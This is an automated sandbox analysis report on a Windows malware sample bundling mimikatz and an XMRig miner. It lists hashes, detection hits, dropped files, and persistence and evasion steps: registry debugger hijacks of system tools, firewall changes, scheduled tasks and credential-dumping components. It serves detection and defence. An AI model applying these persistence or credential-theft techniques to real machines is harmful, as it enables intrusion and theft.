mimikatz | afaff8a887f228299e37ffa901d8a7c3f5c0609c4384169adf4fe26249bddc85

Analysis

max time kernel
150s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20240419-en
resource tags

arch:x64arch:x86image:win10v2004-20240419-enlocale:en-usos:windows10-2004-x64system
submitted
01/05/2024, 10:55

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2024-05-01_44bbd2a4a4bf1012974660d81acadfa3_hacktools_icedid_mimikatz.exe
Size

8.8MB
MD5

44bbd2a4a4bf1012974660d81acadfa3
SHA1

8cade5a49367b71e0c5e6ab8f368c4f5aa7a4b29
SHA256

afaff8a887f228299e37ffa901d8a7c3f5c0609c4384169adf4fe26249bddc85
SHA512

b7ce2d6bda1a05ee4d374574efab39b429fbfa189a4e9571f355367549e56128771519406f106363a36438fd43827599a5374df850bf6a8bec9e3f9507edc88a
SSDEEP

196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYP:a3jz0E52/iv1

Score

10^/10

mimikatz xmrig discovery evasion miner persistence upx

Malware Config

Signatures

Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
mimikatz

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 2564 created 2080	2564	clzutbi.exe	37

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Contacts a large (44938) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

Detects executables containing SQL queries to confidential data stores. Observed in infostealers 2 IoCs

resource	yara_rule
behavioral2/memory/1668-136-0x00007FF6DB100000-0x00007FF6DB1EE000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_SQLQuery_ConfidentialDataStore
behavioral2/memory/1668-138-0x00007FF6DB100000-0x00007FF6DB1EE000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_SQLQuery_ConfidentialDataStore

UPX dump on OEP (original entry point) 39 IoCs

resource	yara_rule
behavioral2/memory/4064-0-0x0000000000400000-0x0000000000A9B000-memory.dmp	UPX
behavioral2/memory/4064-4-0x0000000000400000-0x0000000000A9B000-memory.dmp	UPX
behavioral2/files/0x000b000000023ba2-6.dat	UPX
behavioral2/memory/3840-8-0x0000000000400000-0x0000000000A9B000-memory.dmp	UPX
behavioral2/files/0x0008000000023c61-134.dat	UPX
behavioral2/memory/1668-136-0x00007FF6DB100000-0x00007FF6DB1EE000-memory.dmp	UPX
behavioral2/memory/1668-138-0x00007FF6DB100000-0x00007FF6DB1EE000-memory.dmp	UPX
behavioral2/memory/2072-146-0x00007FF76CF30000-0x00007FF76CF8B000-memory.dmp	UPX
behavioral2/files/0x0008000000023c93-145.dat	UPX
behavioral2/memory/2072-160-0x00007FF76CF30000-0x00007FF76CF8B000-memory.dmp	UPX
behavioral2/files/0x0008000000023c90-164.dat	UPX
behavioral2/memory/3368-165-0x00007FF6E20B0000-0x00007FF6E21D0000-memory.dmp	UPX
behavioral2/memory/2024-171-0x00007FF76CF30000-0x00007FF76CF8B000-memory.dmp	UPX
behavioral2/memory/1664-175-0x00007FF76CF30000-0x00007FF76CF8B000-memory.dmp	UPX
behavioral2/memory/2388-187-0x00007FF76CF30000-0x00007FF76CF8B000-memory.dmp	UPX
behavioral2/memory/3368-190-0x00007FF6E20B0000-0x00007FF6E21D0000-memory.dmp	UPX
behavioral2/memory/5328-192-0x00007FF76CF30000-0x00007FF76CF8B000-memory.dmp	UPX
behavioral2/memory/4756-196-0x00007FF76CF30000-0x00007FF76CF8B000-memory.dmp	UPX
behavioral2/memory/3368-199-0x00007FF6E20B0000-0x00007FF6E21D0000-memory.dmp	UPX
behavioral2/memory/5968-201-0x00007FF76CF30000-0x00007FF76CF8B000-memory.dmp	UPX
behavioral2/memory/5740-205-0x00007FF76CF30000-0x00007FF76CF8B000-memory.dmp	UPX
behavioral2/memory/3368-208-0x00007FF6E20B0000-0x00007FF6E21D0000-memory.dmp	UPX
behavioral2/memory/6100-210-0x00007FF76CF30000-0x00007FF76CF8B000-memory.dmp	UPX
behavioral2/memory/5248-214-0x00007FF76CF30000-0x00007FF76CF8B000-memory.dmp	UPX
behavioral2/memory/4732-218-0x00007FF76CF30000-0x00007FF76CF8B000-memory.dmp	UPX
behavioral2/memory/3368-220-0x00007FF6E20B0000-0x00007FF6E21D0000-memory.dmp	UPX
behavioral2/memory/2032-223-0x00007FF76CF30000-0x00007FF76CF8B000-memory.dmp	UPX
behavioral2/memory/6052-227-0x00007FF76CF30000-0x00007FF76CF8B000-memory.dmp	UPX
behavioral2/memory/3368-229-0x00007FF6E20B0000-0x00007FF6E21D0000-memory.dmp	UPX
behavioral2/memory/5996-231-0x00007FF76CF30000-0x00007FF76CF8B000-memory.dmp	UPX
behavioral2/memory/3000-235-0x00007FF76CF30000-0x00007FF76CF8B000-memory.dmp	UPX
behavioral2/memory/3368-236-0x00007FF6E20B0000-0x00007FF6E21D0000-memory.dmp	UPX
behavioral2/memory/2904-237-0x00007FF76CF30000-0x00007FF76CF8B000-memory.dmp	UPX
behavioral2/memory/1936-240-0x00007FF76CF30000-0x00007FF76CF8B000-memory.dmp	UPX
behavioral2/memory/5940-242-0x00007FF76CF30000-0x00007FF76CF8B000-memory.dmp	UPX
behavioral2/memory/3368-243-0x00007FF6E20B0000-0x00007FF6E21D0000-memory.dmp	UPX
behavioral2/memory/3368-244-0x00007FF6E20B0000-0x00007FF6E21D0000-memory.dmp	UPX
behavioral2/memory/3368-245-0x00007FF6E20B0000-0x00007FF6E21D0000-memory.dmp	UPX
behavioral2/memory/3368-246-0x00007FF6E20B0000-0x00007FF6E21D0000-memory.dmp	UPX

XMRig Miner payload 10 IoCs

miner

resource	yara_rule
behavioral2/memory/3368-190-0x00007FF6E20B0000-0x00007FF6E21D0000-memory.dmp	xmrig
behavioral2/memory/3368-199-0x00007FF6E20B0000-0x00007FF6E21D0000-memory.dmp	xmrig
behavioral2/memory/3368-208-0x00007FF6E20B0000-0x00007FF6E21D0000-memory.dmp	xmrig
behavioral2/memory/3368-220-0x00007FF6E20B0000-0x00007FF6E21D0000-memory.dmp	xmrig
behavioral2/memory/3368-229-0x00007FF6E20B0000-0x00007FF6E21D0000-memory.dmp	xmrig
behavioral2/memory/3368-236-0x00007FF6E20B0000-0x00007FF6E21D0000-memory.dmp	xmrig
behavioral2/memory/3368-243-0x00007FF6E20B0000-0x00007FF6E21D0000-memory.dmp	xmrig
behavioral2/memory/3368-244-0x00007FF6E20B0000-0x00007FF6E21D0000-memory.dmp	xmrig
behavioral2/memory/3368-245-0x00007FF6E20B0000-0x00007FF6E21D0000-memory.dmp	xmrig
behavioral2/memory/3368-246-0x00007FF6E20B0000-0x00007FF6E21D0000-memory.dmp	xmrig

mimikatz is an open source tool to dump credentials on Windows 6 IoCs

resource	yara_rule
behavioral2/memory/4064-0-0x0000000000400000-0x0000000000A9B000-memory.dmp	mimikatz
behavioral2/memory/4064-4-0x0000000000400000-0x0000000000A9B000-memory.dmp	mimikatz
behavioral2/files/0x000b000000023ba2-6.dat	mimikatz
behavioral2/memory/3840-8-0x0000000000400000-0x0000000000A9B000-memory.dmp	mimikatz
behavioral2/memory/1668-136-0x00007FF6DB100000-0x00007FF6DB1EE000-memory.dmp	mimikatz
behavioral2/memory/1668-138-0x00007FF6DB100000-0x00007FF6DB1EE000-memory.dmp	mimikatz

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File created	C:\Windows\system32\drivers\etc\hosts	clzutbi.exe
File opened for modification	C:\Windows\system32\drivers\etc\hosts	clzutbi.exe
File created	C:\Windows\system32\drivers\npf.sys	wpcap.exe

Modifies Windows Firewall 2 TTPs 2 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
2968	netsh.exe
3372	netsh.exe

Sets file execution options in registry 2 TTPs 40 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	clzutbi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	clzutbi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe	clzutbi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe	clzutbi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	clzutbi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe	clzutbi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe	clzutbi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	clzutbi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe	clzutbi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe	clzutbi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	clzutbi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe	clzutbi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	clzutbi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe	clzutbi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	clzutbi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	clzutbi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe	clzutbi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	clzutbi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	clzutbi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	clzutbi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe	clzutbi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	clzutbi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe	clzutbi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	clzutbi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe	clzutbi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe	clzutbi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe	clzutbi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	clzutbi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	clzutbi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe	clzutbi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe	clzutbi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	clzutbi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe	clzutbi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe	clzutbi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	clzutbi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	clzutbi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe	clzutbi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	clzutbi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe	clzutbi.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	clzutbi.exe

Executes dropped EXE 28 IoCs

pid	Process
3840	clzutbi.exe
2564	clzutbi.exe
1196	wpcap.exe
4600	krejtiiti.exe
1668	vfshost.exe
2592	xohudmc.exe
2072	tmrkyzihy.exe
2176	joxnkm.exe
3368	uuktqy.exe
2024	tmrkyzihy.exe
1664	tmrkyzihy.exe
4968	ubntibupm.exe
2388	tmrkyzihy.exe
5328	tmrkyzihy.exe
4756	tmrkyzihy.exe
5968	tmrkyzihy.exe
5740	tmrkyzihy.exe
6100	tmrkyzihy.exe
5248	tmrkyzihy.exe
4732	tmrkyzihy.exe
2032	tmrkyzihy.exe
6052	tmrkyzihy.exe
5996	tmrkyzihy.exe
3444	clzutbi.exe
3000	tmrkyzihy.exe
2904	tmrkyzihy.exe
1936	tmrkyzihy.exe
5940	tmrkyzihy.exe

Loads dropped DLL 12 IoCs

pid	Process
1196	wpcap.exe
1196	wpcap.exe
1196	wpcap.exe
1196	wpcap.exe
1196	wpcap.exe
1196	wpcap.exe
1196	wpcap.exe
1196	wpcap.exe
1196	wpcap.exe
4600	krejtiiti.exe
4600	krejtiiti.exe
4600	krejtiiti.exe

UPX packed file 35 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0008000000023c61-134.dat	upx
behavioral2/memory/1668-136-0x00007FF6DB100000-0x00007FF6DB1EE000-memory.dmp	upx
behavioral2/memory/1668-138-0x00007FF6DB100000-0x00007FF6DB1EE000-memory.dmp	upx
behavioral2/memory/2072-146-0x00007FF76CF30000-0x00007FF76CF8B000-memory.dmp	upx
behavioral2/files/0x0008000000023c93-145.dat	upx
behavioral2/memory/2072-160-0x00007FF76CF30000-0x00007FF76CF8B000-memory.dmp	upx
behavioral2/files/0x0008000000023c90-164.dat	upx
behavioral2/memory/3368-165-0x00007FF6E20B0000-0x00007FF6E21D0000-memory.dmp	upx
behavioral2/memory/2024-171-0x00007FF76CF30000-0x00007FF76CF8B000-memory.dmp	upx
behavioral2/memory/1664-175-0x00007FF76CF30000-0x00007FF76CF8B000-memory.dmp	upx
behavioral2/memory/2388-187-0x00007FF76CF30000-0x00007FF76CF8B000-memory.dmp	upx
behavioral2/memory/3368-190-0x00007FF6E20B0000-0x00007FF6E21D0000-memory.dmp	upx
behavioral2/memory/5328-192-0x00007FF76CF30000-0x00007FF76CF8B000-memory.dmp	upx
behavioral2/memory/4756-196-0x00007FF76CF30000-0x00007FF76CF8B000-memory.dmp	upx
behavioral2/memory/3368-199-0x00007FF6E20B0000-0x00007FF6E21D0000-memory.dmp	upx
behavioral2/memory/5968-201-0x00007FF76CF30000-0x00007FF76CF8B000-memory.dmp	upx
behavioral2/memory/5740-205-0x00007FF76CF30000-0x00007FF76CF8B000-memory.dmp	upx
behavioral2/memory/3368-208-0x00007FF6E20B0000-0x00007FF6E21D0000-memory.dmp	upx
behavioral2/memory/6100-210-0x00007FF76CF30000-0x00007FF76CF8B000-memory.dmp	upx
behavioral2/memory/5248-214-0x00007FF76CF30000-0x00007FF76CF8B000-memory.dmp	upx
behavioral2/memory/4732-218-0x00007FF76CF30000-0x00007FF76CF8B000-memory.dmp	upx
behavioral2/memory/3368-220-0x00007FF6E20B0000-0x00007FF6E21D0000-memory.dmp	upx
behavioral2/memory/2032-223-0x00007FF76CF30000-0x00007FF76CF8B000-memory.dmp	upx
behavioral2/memory/6052-227-0x00007FF76CF30000-0x00007FF76CF8B000-memory.dmp	upx
behavioral2/memory/3368-229-0x00007FF6E20B0000-0x00007FF6E21D0000-memory.dmp	upx
behavioral2/memory/5996-231-0x00007FF76CF30000-0x00007FF76CF8B000-memory.dmp	upx
behavioral2/memory/3000-235-0x00007FF76CF30000-0x00007FF76CF8B000-memory.dmp	upx
behavioral2/memory/3368-236-0x00007FF6E20B0000-0x00007FF6E21D0000-memory.dmp	upx
behavioral2/memory/2904-237-0x00007FF76CF30000-0x00007FF76CF8B000-memory.dmp	upx
behavioral2/memory/1936-240-0x00007FF76CF30000-0x00007FF76CF8B000-memory.dmp	upx
behavioral2/memory/5940-242-0x00007FF76CF30000-0x00007FF76CF8B000-memory.dmp	upx
behavioral2/memory/3368-243-0x00007FF6E20B0000-0x00007FF6E21D0000-memory.dmp	upx
behavioral2/memory/3368-244-0x00007FF6E20B0000-0x00007FF6E21D0000-memory.dmp	upx
behavioral2/memory/3368-245-0x00007FF6E20B0000-0x00007FF6E21D0000-memory.dmp	upx
behavioral2/memory/3368-246-0x00007FF6E20B0000-0x00007FF6E21D0000-memory.dmp	upx

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
20	ifconfig.me

Creates a Windows Service
persistence

Drops file in System32 directory 10 IoCs

description	ioc	Process
File created	C:\Windows\SysWOW64\joxnkm.exe	xohudmc.exe
File opened for modification	C:\Windows\SysWOW64\joxnkm.exe	xohudmc.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5	clzutbi.exe
File created	C:\Windows\SysWOW64\pthreadVC.dll	wpcap.exe
File created	C:\Windows\SysWOW64\wpcap.dll	wpcap.exe
File created	C:\Windows\SysWOW64\Packet.dll	wpcap.exe
File created	C:\Windows\system32\wpcap.dll	wpcap.exe
File created	C:\Windows\system32\Packet.dll	wpcap.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE	clzutbi.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies	clzutbi.exe

Drops file in Program Files directory 3 IoCs

description	ioc	Process
File created	C:\Program Files\WinPcap\rpcapd.exe	wpcap.exe
File created	C:\Program Files\WinPcap\LICENSE	wpcap.exe
File created	C:\Program Files\WinPcap\uninstall.exe	wpcap.exe

Drops file in Windows directory 59 IoCs

description	ioc	Process
File created	C:\Windows\ukbuctgtv\UnattendGC\specials\cnli-1.dll	clzutbi.exe
File created	C:\Windows\ukbuctgtv\UnattendGC\specials\svschost.exe	clzutbi.exe
File created	C:\Windows\ukbuctgtv\UnattendGC\specials\libxml2.dll	clzutbi.exe
File created	C:\Windows\ukbuctgtv\UnattendGC\specials\tibe-2.dll	clzutbi.exe
File created	C:\Windows\ukbuctgtv\UnattendGC\specials\docmicfg.xml	clzutbi.exe
File created	C:\Windows\pkcmekii\svschost.xml	clzutbi.exe
File opened for modification	C:\Windows\pkcmekii\vimpcsvc.xml	clzutbi.exe
File created	C:\Windows\ukbuctgtv\UnattendGC\AppCapture32.dll	clzutbi.exe
File created	C:\Windows\ukbuctgtv\pytibitck\ip.txt	clzutbi.exe
File created	C:\Windows\ukbuctgtv\UnattendGC\specials\tucl-1.dll	clzutbi.exe
File created	C:\Windows\ukbuctgtv\UnattendGC\specials\docmicfg.exe	clzutbi.exe
File created	C:\Windows\ukbuctgtv\UnattendGC\specials\xdvl-0.dll	clzutbi.exe
File opened for modification	C:\Windows\pkcmekii\schoedcl.xml	clzutbi.exe
File created	C:\Windows\ukbuctgtv\Corporate\mimidrv.sys	clzutbi.exe
File created	C:\Windows\ukbuctgtv\upbdrjv\swrpwe.exe	clzutbi.exe
File opened for modification	C:\Windows\ukbuctgtv\pytibitck\Packet.dll	clzutbi.exe
File created	C:\Windows\ukbuctgtv\UnattendGC\specials\trfo-2.dll	clzutbi.exe
File created	C:\Windows\ukbuctgtv\UnattendGC\specials\spoolsrv.xml	clzutbi.exe
File created	C:\Windows\pkcmekii\schoedcl.xml	clzutbi.exe
File opened for modification	C:\Windows\pkcmekii\svschost.xml	clzutbi.exe
File created	C:\Windows\ukbuctgtv\pytibitck\ubntibupm.exe	clzutbi.exe
File created	C:\Windows\ukbuctgtv\UnattendGC\specials\svschost.xml	clzutbi.exe
File opened for modification	C:\Windows\pkcmekii\clzutbi.exe	2024-05-01_44bbd2a4a4bf1012974660d81acadfa3_hacktools_icedid_mimikatz.exe
File created	C:\Windows\ukbuctgtv\pytibitck\krejtiiti.exe	clzutbi.exe
File created	C:\Windows\ukbuctgtv\UnattendGC\specials\ssleay32.dll	clzutbi.exe
File created	C:\Windows\ukbuctgtv\UnattendGC\spoolsrv.xml	clzutbi.exe
File created	C:\Windows\ukbuctgtv\pytibitck\Packet.dll	clzutbi.exe
File created	C:\Windows\ukbuctgtv\UnattendGC\specials\posh-0.dll	clzutbi.exe
File created	C:\Windows\ukbuctgtv\UnattendGC\svschost.xml	clzutbi.exe
File created	C:\Windows\ukbuctgtv\UnattendGC\docmicfg.xml	clzutbi.exe
File created	C:\Windows\pkcmekii\spoolsrv.xml	clzutbi.exe
File opened for modification	C:\Windows\pkcmekii\spoolsrv.xml	clzutbi.exe
File created	C:\Windows\ukbuctgtv\pytibitck\wpcap.dll	clzutbi.exe
File created	C:\Windows\ukbuctgtv\UnattendGC\specials\coli-0.dll	clzutbi.exe
File created	C:\Windows\pkcmekii\docmicfg.xml	clzutbi.exe
File created	C:\Windows\ukbuctgtv\UnattendGC\AppCapture64.dll	clzutbi.exe
File created	C:\Windows\ime\clzutbi.exe	clzutbi.exe
File created	C:\Windows\ukbuctgtv\UnattendGC\specials\zlib1.dll	clzutbi.exe
File created	C:\Windows\ukbuctgtv\UnattendGC\specials\spoolsrv.exe	clzutbi.exe
File created	C:\Windows\ukbuctgtv\UnattendGC\specials\schoedcl.xml	clzutbi.exe
File created	C:\Windows\ukbuctgtv\UnattendGC\specials\ucl.dll	clzutbi.exe
File created	C:\Windows\ukbuctgtv\UnattendGC\vimpcsvc.xml	clzutbi.exe
File created	C:\Windows\ukbuctgtv\UnattendGC\specials\exma-1.dll	clzutbi.exe
File created	C:\Windows\ukbuctgtv\UnattendGC\specials\libeay32.dll	clzutbi.exe
File opened for modification	C:\Windows\ukbuctgtv\Corporate\log.txt	cmd.exe
File created	C:\Windows\ukbuctgtv\pytibitck\wpcap.exe	clzutbi.exe
File created	C:\Windows\ukbuctgtv\UnattendGC\specials\vimpcsvc.exe	clzutbi.exe
File created	C:\Windows\pkcmekii\vimpcsvc.xml	clzutbi.exe
File created	C:\Windows\ukbuctgtv\UnattendGC\Shellcode.ini	clzutbi.exe
File created	C:\Windows\ukbuctgtv\Corporate\vfshost.exe	clzutbi.exe
File created	C:\Windows\pkcmekii\clzutbi.exe	2024-05-01_44bbd2a4a4bf1012974660d81acadfa3_hacktools_icedid_mimikatz.exe
File created	C:\Windows\ukbuctgtv\UnattendGC\specials\crli-0.dll	clzutbi.exe
File opened for modification	C:\Windows\pkcmekii\docmicfg.xml	clzutbi.exe
File created	C:\Windows\ukbuctgtv\UnattendGC\specials\vimpcsvc.xml	clzutbi.exe
File created	C:\Windows\ukbuctgtv\Corporate\mimilib.dll	clzutbi.exe
File created	C:\Windows\ukbuctgtv\UnattendGC\specials\schoedcl.exe	clzutbi.exe
File created	C:\Windows\ukbuctgtv\UnattendGC\schoedcl.xml	clzutbi.exe
File created	C:\Windows\ukbuctgtv\UnattendGC\specials\trch-1.dll	clzutbi.exe
File created	C:\Windows\ukbuctgtv\pytibitck\scan.bat	clzutbi.exe

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
4260	sc.exe
4572	sc.exe
2952	sc.exe
1564	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

NSIS installer 3 IoCs

installer

resource	yara_rule
behavioral2/files/0x000b000000023ba2-6.dat	nsis_installer_2
behavioral2/files/0x000a000000023bb3-15.dat	nsis_installer_1
behavioral2/files/0x000a000000023bb3-15.dat	nsis_installer_2

Creates scheduled task(s) 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
4400	schtasks.exe
4944	schtasks.exe
3088	schtasks.exe

Modifies data under HKEY_USERS 44 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	clzutbi.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	tmrkyzihy.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	tmrkyzihy.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	tmrkyzihy.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	tmrkyzihy.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	clzutbi.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	tmrkyzihy.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	tmrkyzihy.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	tmrkyzihy.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	tmrkyzihy.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	tmrkyzihy.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	tmrkyzihy.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	tmrkyzihy.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	clzutbi.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	clzutbi.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	tmrkyzihy.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	tmrkyzihy.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	tmrkyzihy.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	tmrkyzihy.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	tmrkyzihy.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	tmrkyzihy.exe
